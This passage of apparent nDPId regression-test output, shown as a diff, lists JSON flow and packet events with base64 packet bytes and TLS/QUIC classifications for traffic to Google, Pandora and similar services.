1EHfQ5lAWTWpN49l9Tiv7IrVgj7Dp+73Bh+\/I4be++4+GN0yWQOqn0T+ijD3iAvjW07u4KFggANU2wFU17wsvlJuMqKoty0iSiIcZD1Fpv8YeBupA3Jd5TcFAQxL\/\/amaXv8CyobSjSega7I6w3iSVpXXusfvcoL9IwMGqCbpjl4yujE+\/2nPBKVvs4iEZolT1zqdJU8Q5tR5vWxmVZ56Vkqmz6hVG35AqABKCyEo\/gk\/PneTs58wsy3Z+6AWG31mbKVGDVWKfuUivH9e1GriPy0Y1T2Vi68\/VxrxY\/w=="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":507,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495836963,"flow_last_seen":1646495836963,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495836963,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.206","src_port":50608,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1646495836963,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495836963,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8O4hAAEAG9ELAqAGAjvq5zsWwAbtVp40sAAAAAKAC+vA0nQAAAgQFtAQCCApsJfcbAAAAAAEDAwc="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1646495836979,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495836979,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8r34AAHIGjcyO+rnOwKgBgAG7xbDcn6Z3VaeNLaAS\/\/\/zpwAAAgQFlgQCCApyIEa6bCX3GwEDAwg="} 01166{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1646495836983,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646495836983,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5O4pAAEAG8kPAqAGAjvq5zsWwAbtVp40t3J+meIAYAfYRowAAAQEICmwl9zByIEa6FgMBAgABAAH8AwOIf7nJ5breQpxi5aty74p4A0tH8s+YhJ7uQwoAchgbeyDiYRrjyIJgoj6ghTCikRuTluEoGumBBaOR1N7eUGiD\/gAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAATABEAAA5nb29nbGVwbHVzLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACBQQOMOQqFJCXmUicpi9d2kYaSiqPqeBjWpdYiUO92OBgAXAEEEwEm0an4CaV7UYrRD1yMS8F4iZzs0QylP5VOKPX+Fji27U1gjEJPJGZS7PVMPfJS0GsqWWRpHV\/lDyKacoCtA0wArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495836963,"flow_last_seen":1646495836983,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495836983,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.206","src_port":50608,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"googleplus.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":510,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495836963,"flow_last_seen":1646495837006,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646495837006,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.206","src_port":50608,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"googleplus.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495836963,"flow_last_seen":1646495836983,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495836983,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.206","src_port":50608,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"googleplus.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":510,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495836963,"flow_last_seen":1646495837006,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646495837006,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.206","src_port":50608,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"googleplus.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":511,"source":"sites.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495837086,"flow_last_seen":1646495837086,"flow_idle_time":200000,"flow_min_l4_payload_len":1357,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":1357,"flow_avg_l4_payload_len":1357,"midstream":0,"thread_ts_msec":1646495837086,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.181.238","src_port":36832,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02265{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":511,"source":"sites.pcapng","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1646495837086,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1399,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1399,"pkt_l4_len":1365,"thread_ts_msec":1646495837086,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAVpAABAAEARLnPAqAGAjvq17o\/gAbsFVdqKwQAAAAEIGskra7CKZYEDuYLxAEIVFxxqmZ08lCd3LEamnRnTwqMewjQTOXHJ+bQBCnc75qyddTeYHQ3SnzAULSCTOvy9BuronZfx+Rok2NEb\/1BsWpwM7HvouqIbg\/UM9rh+Oz94fTVRKCbJSe1Rt9Wi3IS3cTWhF88qqkbPlVNVfTP6qf147kmXwAclEb200UQEzcAZIv3o++EPu3L79R8FmBpBYJnCKkgaxbqODau1mi\/955te0zmkf2846gwZzwMXzDwbr6\/3HnP3h8OfoVM0MIFN9x7Ds+vGpVKDRpQM0NlvNQfFfblQvgPKr6\/wJHgowwd40oBCNI3FTXFgafKbw2f8iXs1MuIi6dbw5qDMfDg7neN7v6\/vcX4HSf8y6PVeyxCvA4+7q957ap\/3PII07iu47YhDzCD0lwTDjfi\/a1raoLz70\/SPK9NEbeWnxibfZXFeg8+E6Qmd9DFP4zQ2QPKahjqlPM4ZePdB1N+sWTrGnHY+e5VOY4qYOyABuFGeuadAN35ZvnTav7s\/+rzxtiAo1AWyqO5W85hkYntoGdWyMOzcrhaGvKoJNlyQWa3gWJkpY39Z1uzVJ9G3lDdAsC9\/zRJfbRKvAouMAfcWbKNWIPlVEx425CNhqzWnjNjSzKi5ec4e5C4us09IcxcJ6YiARP3HINF5Ycp8CM+O3SAPpWjAj1wgjVCtDNLk+H+lVLgNqHb0nSuRRFGscCZoJV0VpfhM0MYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":511,"source":"sites.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495837086,"flow_last_seen":1646495837086,"flow_idle_time":200000,"flow_min_l4_payload_len":1357,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":1357,"flow_avg_l4_payload_len":1357,"midstream":0,"thread_ts_msec":1646495837086,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.181.238","src_port":36832,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GooglePlus","breed":"Fun","category":"SocialNetwork"},"quic": {"client_requested_server_name":"plus.google.com","version":"TLSv1.3","alpn":"h3","ja3":"b719940c5ab9a3373cb4475d8143ff88","tls_supported_versions":"TLSv1.3"}} +00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":511,"source":"sites.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495837086,"flow_last_seen":1646495837086,"flow_idle_time":200000,"flow_min_l4_payload_len":1357,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":1357,"flow_avg_l4_payload_len":1357,"midstream":0,"thread_ts_msec":1646495837086,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.181.238","src_port":36832,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GooglePlus","breed":"Fun","category":"SocialNetwork"},"quic": {"client_requested_server_name":"plus.google.com","version":"TLSv1.3","alpn":"h3","ja3":"b719940c5ab9a3373cb4475d8143ff88","tls_supported_versions":"TLSv1.3"}} 02275{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":512,"source":"sites.pcapng","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1646495837102,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1399,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1399,"pkt_l4_len":1365,"thread_ts_msec":1646495837102,"pkt":"PKn0qB\/spJGxgjQ5CABFgAVpAABAADMROvOO+rXuwKgBgAG7j+AFVSXtyAAAAAEDuYLxCBrJK2uwimWBAEU4Tznrzq28hb1XmRDs0MFqelTnhcFUZ84H4q1aY4G8iO4oHDfc48pBHn\/VwFJa95gqSHvH4Ev8Om2dP0drKfHTm5RIabnMUwABEpNiK30Wb+s0DC1P8fJqrYirSkcMUtk+OScepXvvMoUJqb3oK\/SHueY\/CR+1r94ahlb+lQ5CMkRrFEpV8Y80c9Tk558ky1YvZroBJocv+D8x22dTrB3Nr2zV5BXUe4IfZjyM1uOvrGOzm7BFlSrMgOj6FKIkCgp\/pf+jrmIN6zoTCYHljLfpxOi3CtJlotE5kvBNJfYTIlpV6ePxOeaBHnLAnR8AUiLMe4EQhoCyafpPSu2uRilBt0zY24SPHj+Vr1q8JDD3+tdbrEpwnhqALSf4fMlI0nlCiW6KDCz9YYUL75K4IS9444yNzf1Yr99Mh0kbqbRkqVD2lz0sc+tejmla91jt2s1ymwqM2Dkc57wq\/ZGL2qTvHoCDCrWXzzSFq2DtMODbeFddKrW7D2S\/WC6gNpi8CkmnUEfrksPztXbMxr+4svM2m36IzD+uTDtBonQOeeetS42fSNmayHtkfbHFRhxhKIWxbXnDeYhaHVYjCQ+4X0zwkTVPladnLIcVEBYqwYQv5\/bz9ieX8wyoykaDLtE9CrJi2EKtZ8wkCC7Z741Zd+Wml1GFTEX8vTPcXOs4jWXGa8by36ak7R21cVgtCbMzCsX51MXYO9rxKpqzQ90YL3ZJybESTLyCZVaetnFQQy0zj9i3aMbEeaF1GIY8fpv41LJIfBTcuddEsku5mHk0ET+hIJRQHhrqv3\/7dLCFIB8IbFzqoMNXvst3vFd153RNd4+wDFw0PTKp3WxAax7aH3o4vpIKkH5MYZZm6QdYg4AXeCOVs+yOQckfo449mppsZnBCauNFwyGHgfdImQc5ChUcBackKfZKPm+8gpfez3Lh5cIH5TVZfBcX2049yxCxwBIQNMHRFZ\/l6px98JrGqv9wlLvZ9x05f9o+OBwqtGjSma1n6CqkHTjCKDb9wEKbD27oXi\/IB1KPHp2u9d\/c+7X2RVtjWmizhI43eqsfAt6YQSI\/I6i5XWGJRa1qw\/6lLbvQvj\/jHqXTS68GWhBdBLJUtfTko6qCsN7rqu1qRzGoIhl0BkGE92lNyYY\/ZTU6\/hdcvPHH\/gVolLu3hFDPu+ipgvDDLIZuRl+UaoOI4gJccnN1m37oKsX6NQtnyeGSc2tM6+62ei3A6X8waSaElCusvteiUGCHQxwaHmAxN+l0Fnrtj2W9v8HqhbG8zavLaMSK9TCSurpq1GtTp5SAztNP1KCrvVnqVhJrjpPBsMoRZgIibHU+b02bSrZ5vLUq8fMRq1DHjSpmxuFXNZXv4gyNl3Dl6lhcF466Vu3DVIKOpmXUnOt94P9drBleL2pc6g\/Rsi+uKui90velUE0hGPgoOIhhDJ0ymy34LYnDdDZuGwprFKEAglwy2+YC1sXbba6gKVjcOV1Ca5zHuLIWZHit470RXXzr7m1Xi\/5cXZYyKSyJACVo6ge6ve+Upi7YI+aW+jgyPqmHMKb+I\/eIOcKZeHyih24R2l7AgjvcvMggC5W8nbNUSu9cpnGWdlPqjTB0D+d7oT5+bGyUabkzh3dJ2t9fzH8gnGtlT1zFzufTmcBCKpbCY6sP\/0lUq7vHjuvu650M0IhuYA8e9G78Y8vHGY8YN9zIOLD+CF2bDXHwqf3VW0Z0KdlLeLkOH0oqFJ9UgLOZLQqYMUReoZ97In3a7hJ65ZurIhpFxCeAoO9kMhJrGIJTN\/Ls9g=="} 00565{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":513,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":513,"packets-processed":512,"total-skipped-flows":0,"total-l4-payload-len":233934,"total-not-detected-flows":0,"total-guessed-flows":4,"total-detected-flows":42,"total-detection-updates":47,"total-updates":0,"current-active-flows":10,"total-active-flows":46,"total-idle-flows":36,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":319,"global_ts_msec":1646568788171} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":513,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646568788171,"flow_last_seen":1646568788171,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646568788171,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":513,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1646568788171,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646568788171,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8AQRAAEAGfpzAqAGA0FUontLaAbs4n4KKAAAAAKAC+vB1NgAAAgQFtAQCCArSjLpwAAAAAAEDAwc="} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":514,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1646568788337,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646568788337,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8Ke1AAPAGpbLQVSiewKgBgAG70tpN2CtOOJ+Ci6ASOQiNqgAAAgQFtAEDAwAEAggKXyXRHtKMunA="} 01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1646568788341,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646568788341,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5AQZAAEAGfJ3AqAGA0FUontLaAbs4n4KLTdgrT4AYAfYOtAAAAQEICtKMuxtfJdEeFgMBAgABAAH8AwNyi5pZnYizmESRNRsWFzLDUgF4AIT\/tX3zYbufDRkzzyDMV\/FK528iuv6PxN\/1DD4BU1TMzFBPBIF01ZAvPFWIVwAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAQAA4AAAtwYW5kb3JhLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACBUk5TxRwMmI7m3PUpmyv2jiTq1G62x80KdY2tfOvxfVgAXAEEEr8O4oznU2jNZk5ZC+\/pUpJeqcDtGn2NikTZa2J69CfKpIdzohOHLj9fffI5zTez3ppU6JIFTO2\/VBVQmSVbRwwArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCLAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646568788171,"flow_last_seen":1646568788341,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646568788341,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pandora","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pandora.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":516,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646568788171,"flow_last_seen":1646568788508,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646568788508,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pandora","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pandora.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"7047b9d842ee4b3fba6a86353828c915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01231{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":518,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646568788171,"flow_last_seen":1646568788673,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3789,"flow_avg_l4_payload_len":631,"midstream":0,"thread_ts_msec":1646568788673,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pandora","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pandora.com","server_names":"*.pandora.com,pandora.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"7047b9d842ee4b3fba6a86353828c915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=GeoTrust TLS RSA CA G1","subjectDN":"C=US, ST=California, L=Oakland, O=Pandora Media, LLC, CN=*.pandora.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"40:BB:03:6C:E8:D4:7C:D7:72:59:2F:8D:DB:4B:64:4F:8F:C4:EB:AF"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646495669804,"flow_last_seen":1646495669824,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.185.106","src_port":33664,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonVideo","breed":"Acceptable","category":"Video"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646495697787,"flow_last_seen":1646495697827,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.142","src_port":56458,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleDrive","breed":"Acceptable","category":"Cloud"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646495836963,"flow_last_seen":1646495837006,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.206","src_port":50608,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646568788171,"flow_last_seen":1646568788847,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4237,"flow_avg_l4_payload_len":529,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pandora","breed":"Fun","category":"Streaming"}} 